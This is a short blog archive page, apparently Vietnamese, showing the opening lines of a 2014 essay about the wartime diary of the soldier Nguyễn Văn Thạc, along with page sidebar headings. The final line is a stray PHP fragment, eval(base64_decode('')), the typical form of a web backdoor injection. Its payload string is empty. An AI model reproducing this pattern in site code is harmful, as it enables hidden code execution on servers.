Archive for April 24th, 2014

Món nợ tuổi hai mươi

Món nợ tuổi hai mươi

(Đọc Mãi mãi tuổi hai mươi, nhật ký của Nguyễn Văn Thạc, người lính miền Bắc chết ở chiến trường Quảng Trị 1972) Tôi đọc nhật ký Mãi mãi tuổi hai mươi của anh Nguyễn Văn Thạc, người lính miền Bắc chết ở Quảng Trị lần đ

04.24.2014 | Tiểu Luận- Chính Luận |

6 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>